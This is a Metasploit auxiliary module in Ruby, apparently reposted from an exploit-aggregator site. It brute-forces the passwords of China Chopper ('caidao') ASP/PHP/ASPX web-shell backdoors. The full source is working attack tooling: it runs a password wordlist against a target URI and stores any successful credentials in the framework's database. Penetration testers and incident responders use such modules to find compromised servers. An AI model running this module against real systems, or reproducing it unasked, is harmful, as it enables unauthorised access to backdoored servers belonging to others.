Share
## https://sploitus.com/exploit?id=PACKETSTORM:181158
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'metasploit/framework/credential_collection'  
require 'metasploit/framework/login_scanner/caidao'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::AuthBrute  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Chinese Caidao Backdoor Bruteforce',  
'Description' => 'This module attempts to bruteforce chinese caidao asp/php/aspx backdoor.',  
'Author' => [ 'Nixawk' ],  
'References' => [  
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],  
['URL', 'https://www.mandiant.com/resources/breaking-down-the-china-chopper-web-shell-part-ii'],  
['URL', 'https://www.exploit-db.com/docs/27654.pdf'],  
['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-314A'],  
['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']  
],  
'License' => MSF_LICENSE  
))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The URL that handles the login process', '/caidao.php']),  
OptPath.new('PASS_FILE', [  
false,  
'The file that contains a list of of probable passwords.',  
File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')  
])  
])  
  
# caidao does not have an username, there's only password  
deregister_options('HttpUsername', 'HttpPassword', 'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS')  
end  
  
def scanner(ip)  
@scanner ||= lambda {  
cred_collection = build_credential_collection(  
# The LoginScanner API refuses to run if there's no username, so we give it a fake one.  
# But we will not be reporting this to the database.  
username: 'caidao',  
password: datastore['PASSWORD']  
)  
  
return Metasploit::Framework::LoginScanner::Caidao.new(  
configure_http_login_scanner(  
host: ip,  
port: datastore['RPORT'],  
uri: datastore['TARGETURI'],  
cred_details: cred_collection,  
stop_on_success: datastore['STOP_ON_SUCCESS'],  
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],  
connection_timeout: 5,  
http_username: datastore['HttpUsername'],  
http_password: datastore['HttpPassword']  
))  
}.call  
end  
  
def report_good_cred(ip, port, result)  
service_data = {  
address: ip,  
port: port,  
service_name: 'http',  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
module_fullname: self.fullname,  
origin_type: :service,  
private_data: result.credential.private,  
private_type: :password,  
}.merge(service_data)  
  
login_data = {  
core: create_credential(credential_data),  
last_attempted_at: DateTime.now,  
status: result.status,  
proof: result.proof  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def report_bad_cred(ip, rport, result)  
invalidate_login(  
address: ip,  
port: rport,  
protocol: 'tcp',  
private: result.credential.private,  
realm_key: result.credential.realm_key,  
realm_value: result.credential.realm,  
status: result.status,  
proof: result.proof  
)  
end  
  
# Attempts to login  
def bruteforce(ip)  
scanner(ip).scan! do |result|  
case result.status  
when Metasploit::Model::Login::Status::SUCCESSFUL  
print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential.private}'")  
report_good_cred(ip, rport, result)  
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT  
vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)  
report_bad_cred(ip, rport, result)  
when Metasploit::Model::Login::Status::INCORRECT  
vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential.private}'")  
report_bad_cred(ip, rport, result)  
end  
end  
end  
  
def run_host(ip)  
unless scanner(ip).check_setup  
print_brute(:level => :error, :ip => ip, :msg => 'Backdoor type is not support')  
return  
end  
  
bruteforce(ip)  
end  
end